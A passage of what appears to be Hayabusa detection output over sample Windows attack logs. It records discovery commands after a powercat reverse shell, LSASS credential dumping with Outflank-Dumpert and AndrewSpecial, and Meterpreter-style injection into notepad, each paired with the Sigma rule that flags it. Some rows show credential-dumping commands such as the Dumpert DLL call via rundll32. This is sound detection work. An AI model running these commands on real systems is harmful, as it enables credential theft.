Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:52.956 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 1476 | PGUID: 365ABB72-3ED8-5D0B-0000-0010398F1A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:58.816 +09:00,IEWIN7,1,low,Disc,Suspicious Execution of Systeminfo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_systeminfo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:58.816 +09:00,IEWIN7,1,info,,Process Created,"Cmd: systeminfo | Process: C:\Windows\System32\systeminfo.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 3820 | PGUID: 365ABB72-3EDE-5D0B-0000-001032961A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Outflank-Dumpert.exe | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Hash: 
SHA1=3A41FF5A6CDEC8829876E0486A0072BC8D13DCF1,MD5=D4940C501545BCFD11D6DC75B5D0FEC9,SHA256=38879FE4AA25044DB241B093E6A1CF904BA9F4E999041C0CC039E2D5F7ABA044,IMPHASH=88788EE624180BE467F3C32F4720AA97",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,../hayabusa-rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 
16:35:37.329 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,info,,Process Created,"Cmd: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump | Process: C:\Windows\System32\rundll32.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,../hayabusa-rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: 
ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,../hayabusa-rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src 
PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: AndrewSpecial.exe | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Hash: SHA1=FE6BEB0E26F71F8587415507B318B161FBC3338B,MD5=4791C98C096587DB8DFECD5CA894DD56,SHA256=2969E70B74A12E3B0441D0BDA498322464A8614421B00321E889756D60AB4200,IMPHASH=40B5A4911712471B34D39C3AC7E99193",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\Desktop\Andrew.dmp | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src 
User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-07-04 05:10:06.475 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Lateral Movement - New Named Pipe added to NullSession | SetValue: HKLM\System\CurrentControlSet\services\LanmanServer\Parameters\NullSessionPipes: Binary Data | Process: C:\Windows\system32\reg.exe | PID: 3844 | PGUID: 365ABB72-0B9E-5D1D-0000-00100BF40D00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_add_new_namedpipe_tp_nullsession_registry_turla_like_ttp.evtx 2019-07-04 05:39:29.223 +09:00,IEWIN7,10,low,,Process Access,Src Process: ㄀ | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 
2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.129 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.160 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.207 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\notepad.exe"" | LID: 0x135ca | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\system32\notepad.exe | Tgt Process: C:\Windows\system32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1632 | Src PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00 | Tgt PID: 2328 | Tgt PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,LatMov | Exec,Rundll32 Without Parameters,,../hayabusa-rules/sigma/process_creation/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
